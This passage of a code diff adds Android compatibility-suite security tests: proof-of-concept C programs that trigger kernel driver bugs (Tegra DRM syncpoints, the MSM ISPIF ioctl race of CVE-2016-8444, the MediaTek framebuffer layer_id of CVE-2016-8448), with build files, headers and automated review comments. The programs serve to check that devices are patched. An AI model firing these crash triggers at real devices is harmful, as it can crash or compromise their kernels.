+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+	int ret;
+	int dev_fd;
+	int i;
+
+	/* open dev */
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+		return 0;
+	}
+	
+	/* prepare for ioctl */
+	open_c.client = HOST1X_CLASS_VIC;
+	submit_c.num_syncpts = SYN_NUM;
+	submit_c.syncpts = (__u64)syncpts;
+
+	for(i = 1; i < SYN_NUM; i++){
+		syncpts[i].id = 192;
+		syncpts[i].incrs = 0xffff;
+	}
+
+	/* open channel */
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+		goto out_dev;
+	}
+	submit_c.context = open_c.context;
+	printf("[+] call submit\n");
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	printf("[+] submit return %d\n", ret);
+	
+out_dev:
+	close(dev_fd);
+	return 0;
+}
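Review bot: `main` returns 0 on every path: when `open` fails, when `DRM_IOCTL_TEGRA_OPEN_CHANNEL` fails, and whatever `DRM_IOCTL_TEGRA_SUBMIT` returns. The program therefore gives its caller no pass/fail signal beyond the printed text. The host-side harness is not visible here, but a short comment above `main` should state what a patched kernel is expected to do with this request and how the harness tells the two outcomes apart. The fill loop starts at `i = 1`, leaving `syncpts[0]` zeroed. If that is deliberate it deserves a comment such as `/* entry 0 intentionally left as id 0, incrs 0 */`; if not, the loop should start at 0.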
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+  int32_t  cfg_type;
+  union {
+    int reg_dump;                        /* ISPIF_ENABLE_REG_DUMP */
+    uint32_t csid_version;               /* ISPIF_INIT */
+    //struct msm_ispif_vfe_info vfe_info;  /* ISPIF_SET_VFE_INFO */
+    //struct msm_ispif_param_data params;  /* CFG, START, STOP */
+  };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+  int arg1[3] =  {0};
+  switch ((long)arg) {
+  case 0:
+    data.cfg_type = 8; ////release
+    ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+    break;
+  case 1:
+    ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+    break;
+  }
+  return NULL;
+}
+
+int main() {
+
+  int pid,i;
+  pthread_t th[4];
+  fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+  printf("please wait for several seconds...\n");
+
+  while(1){
+
+    data.cfg_type = 2; ////init
+    data.csid_version = 1;
+    ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+    for (i = 0; i < 2; i++) {
+      pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+      usleep(10);
+    }
+  }
+  return 0;
+}
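Review bot: `ioctl` is called in `worker_thread` and `main`, but `<sys/ioctl.h>` is not among the includes, so the calls rely on an implicit declaration. Add `#include <sys/ioctl.h>`. The result of `open` is never checked, so on a device without `/dev/v4l-subdev17` the loop spins forever issuing `ioctl` on fd -1 and spawning threads; a guard such as `if (fd < 0) return 0;` right after the `open` avoids that. The threads created in the endless `while(1)` are never joined or detached, and only two of the four `th[]` slots are used. `pid` and `r[11]` are unused, and the `0x0ul` flag argument would read better as `O_RDONLY`.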
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD                 ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID			 ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK              (0x00000fff)
+#define FBCAPS_LCDC_MASK                 (0x00fff000)
+#define FBCAPS_PANEL_MASK                (0xff000000)
+#define FBCAPS_MANUAL_UPDATE             (0x00001000)
+#define FBCAPS_SET_BACKLIGHT             (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND     (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype)     _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype)     _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype)    _IOWR('O', num, dtype)
+#define MTK_IO(num)             _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG			MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER                MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT                 MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS                 MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER              MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE          MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS              MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER           MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER         MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION                  MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE                   MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER                MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER              MTK_IO(11)
+#define MTKFB_POWERON				           MTK_IO(12)
+#define MTKFB_POWEROFF				           MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER           MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D                  MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM		               MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED          MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED             MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED               MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE               MTK_IOR(20, unsigned long)	/* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE		           MTK_IOR(21, unsigned long)	/* /0: power off  1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION       MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST                  MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO           MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST                MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA              MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE                 MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN              MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT       MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE   MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO               MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE  512       /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL                MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY               MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT          MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE              MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER              MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER             MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE     MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN              MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION			           MTK_IO(49)
+#define MTKFB_GETFPS			               MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC                            MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ                   MTK_IOW(52, unsigned long)	/* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED                MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA               MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY              MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT		       MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE              MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+	MTK_FB_ORIENTATION_0 = 0,
+	MTK_FB_ORIENTATION_90 = 1,
+	MTK_FB_ORIENTATION_180 = 2,
+	MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+	MTK_FB_TV_SYSTEM_NTSC = 0,
+	MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+	MTK_FB_TV_FMT_RGB565 = 0,
+	MTK_FB_TV_FMT_YUV420_SEQ = 1,
+	MTK_FB_TV_FMT_UYUV422 = 2,
+	MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+	LAYER_NORMAL_BUFFER = 0,
+	LAYER_SECURE_BUFFER = 1,
+	LAYER_PROTECTED_BUFFER = 2,
+	LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001,	/* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+	char name[32];
+	int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+	MTK_FB_FORMAT format;
+
+	volatile char *outputBuffer;
+	unsigned int wdma_width;
+	unsigned int wdma_height;
+};
+
+struct fb_scale {
+	unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+	unsigned int idx;
+	unsigned long offset;
+};
+
+struct fb_update_window {
+	unsigned int x, y;
+	unsigned int width, height;
+};
+
+typedef enum {
+	LAYER_2D = 0,
+	LAYER_3D_SBS_0 = 0x1,
+	LAYER_3D_SBS_90 = 0x2,
+	LAYER_3D_SBS_180 = 0x3,
+	LAYER_3D_SBS_270 = 0x4,
+	LAYER_3D_TAB_0 = 0x10,
+	LAYER_3D_TAB_90 = 0x20,
+	LAYER_3D_TAB_180 = 0x30,
+	LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+	DISP_DIRECT_LINK_MODE,
+	DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+	MTK_DISP_MODE mode;
+};
+
+typedef enum {			/* map sessions to scenairos in kernel driver */
+	DISP_SESSION_LCM = 1 << 0,	/* DSI0 */
+	DISP_SESSION_MEM = 1 << 1,	/* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+	DISP_SESSION_WFD = 1 << 2,
+	DISP_SESSION_MHL = 1 << 3,	/* DPI */
+	DISP_SESSION_LCM1 = 1 << 4,	/* DSI1 */
+	DISP_SESSION_MEM1 = 1 << 5,	/* OVL1->WDMA1 */
+	/* TODO:can be extended with other Session Id */
+	SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+	unsigned int session;	/* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+	MTK_DISP_MODE mode;
+	unsigned int session;
+};
+struct fb_overlay_buffer {
+	/* Input */
+	int layer_id;
+	unsigned int layer_en;
+	int ion_fd;
+	unsigned int cache_sync;
+	/* Output */
+	unsigned int index;
+	int fence_fd;
+};
+
+struct fb_overlay_layer {
+	unsigned int layer_id;
+	unsigned int layer_enable;
+
+	void *src_base_addr;
+	void *src_phy_addr;
+	unsigned int src_direct_link;
+	MTK_FB_FORMAT src_fmt;
+	unsigned int src_use_color_key;
+	unsigned int src_color_key;
+	unsigned int src_pitch;
+	unsigned int src_offset_x, src_offset_y;
+	unsigned int src_width, src_height;
+
+	unsigned int tgt_offset_x, tgt_offset_y;
+	unsigned int tgt_width, tgt_height;
+	MTK_FB_ORIENTATION layer_rotation;
+	MTK_FB_LAYER_TYPE layer_type;
+	MTK_FB_ORIENTATION video_rotation;
+
+	unsigned int isTdshp;	/* set to 1, will go through tdshp first, then layer blending, then to color */
+
+	int next_buff_idx;
+	int identity;
+	int connected_type;
+	unsigned int security;
+	unsigned int alpha_enable;
+	unsigned int alpha;
+	int fence_fd;		/* 8135 */
+	int ion_fd;		/* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+	int fence;
+	int time;
+	struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+	unsigned int src_vir_addr;
+	unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+	unsigned int layer_id;
+	unsigned int layer_enabled;	/* TO BE DEL */
+	unsigned int curr_en;
+	unsigned int next_en;
+	unsigned int hw_en;
+	int curr_idx;
+	int next_idx;
+	int hw_idx;
+	int curr_identity;
+	int next_identity;
+	int hw_identity;
+	int curr_conn_type;
+	int next_conn_type;
+	int hw_conn_type;
+	MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+	void *phy_addr;
+	void *vir_addr;
+	MTK_FB_TV_SRC_FORMAT format;
+	unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+	MTKFB_DISABLED = 0,
+	MTKFB_SUSPENDED = 99,
+	MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+	MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+	MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+	MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+	struct work_struct work;
+	struct list_head list;
+	struct fb_overlay_config config;
+	struct sync_fence *fences[4];
+	struct ion_handle *ion_handles[4];
+	void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+	int state;
+	void *fb_va_base;	/* MPU virtual address */
+	dma_addr_t fb_pa_base;	/* Bus physical address */
+	unsigned long fb_size_in_byte;
+	void *ovl_va_base;	/* MPU virtual address */
+	dma_addr_t ovl_pa_base;	/* Bus physical address */
+	unsigned long ovl_size_in_byte;
+
+	unsigned long layer_enable;
+	MTK_FB_FORMAT *layer_format;
+	unsigned int layer_config_dirty;
+
+	int xscale, yscale, mirror;	/* transformations.
+					   rotate is stored in fb_info->var */
+	u32 pseudo_palette[17];
+
+	struct fb_info *fb_info;	/* Linux fbdev framework data */
+	struct device *dev;
+
+	/* Android native fence support */
+	struct workqueue_struct *update_ovls_wq;
+	struct mutex timeline_lock;
+	struct sw_sync_timeline *timeline;
+	int timeline_max;
+	struct list_head pending_configs;	/* CL2340210 */
+	struct ion_client *ion_client;
+};
+
+#endif				/* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif				/* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+	typedef enum {
+		DISPIF_TYPE_DBI = 0,
+		DISPIF_TYPE_DPI,
+		DISPIF_TYPE_DSI,
+		DISPIF_TYPE_DPI0,
+		DISPIF_TYPE_DPI1,
+		DISPIF_TYPE_DSI0,
+		DISPIF_TYPE_DSI1,
+		HDMI = 7,
+		HDMI_SMARTBOOK,
+		MHL,
+		DISPIF_TYPE_EPD,
+		SLIMPORT
+	} MTKFB_DISPIF_TYPE;
+
+	typedef enum {
+		MTKFB_DISPIF_PRIMARY_LCD = 0,
+		MTKFB_DISPIF_HDMI,
+		MTKFB_DISPIF_EPD,
+		MTKFB_MAX_DISPLAY_COUNT
+	} MTKFB_DISPIF_DEVICE_TYPE;
+
+	typedef enum {
+		DISPIF_FORMAT_RGB565 = 0,
+		DISPIF_FORMAT_RGB666,
+		DISPIF_FORMAT_RGB888
+	} MTKFB_DISPIF_FORMAT;
+
+
+	typedef enum {
+		DISPIF_MODE_VIDEO = 0,
+		DISPIF_MODE_COMMAND
+	} MTKFB_DISPIF_MODE;
+
+	typedef struct mtk_dispif_info {
+		unsigned int display_id;
+		unsigned int isHwVsyncAvailable;
+		MTKFB_DISPIF_TYPE displayType;
+		unsigned int displayWidth;
+		unsigned int displayHeight;
+		unsigned int displayFormat;
+		MTKFB_DISPIF_MODE displayMode;
+		unsigned int vsyncFPS;
+		unsigned int physicalWidth;
+		unsigned int physicalHeight;
+		unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+		unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+		unsigned int lcmOriginalHeight;
+	} mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp)  (((id) << 8) | (bpp))
+
+	typedef enum {
+		MTK_FB_FORMAT_UNKNOWN = 0,
+
+		MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+		MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+		MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+		MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+		MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+		MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+		MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+		MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+		MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+		MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+		MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+		MTK_FB_FORMAT_BPP_MASK = 0xFF,
+	} MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f)    ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif				/* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+    int fd = 0;
+    struct fb_overlay_layer layerInfo;
+    memset(&layerInfo, 0, sizeof(layerInfo));
+    fd = open("/dev/graphics/fb0", O_RDWR);
+    if (fd < 0) {
+		perror("open /dev/graphics/fb0");
+		exit(-1);
+    }
+    printf("Device file opened successfully\n");
+    printf("Trying to get layer info\n");
+    if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+        perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+        exit(-2);
+    }
+    printf("Got layer info\n");
+    printf("Trying to set layer info\n");
+    // set any huge value here
+    int curr_val = 0xf1111111;
+    while(1) {
+        layerInfo.layer_id = curr_val;
+        if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+            perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+            //exit(-2);
+        }
+        curr_val--;
+        if(curr_val == -1) {
+            break;
+        }
+    }
+    printf("Set layer info\n");
+    return 0;
+}
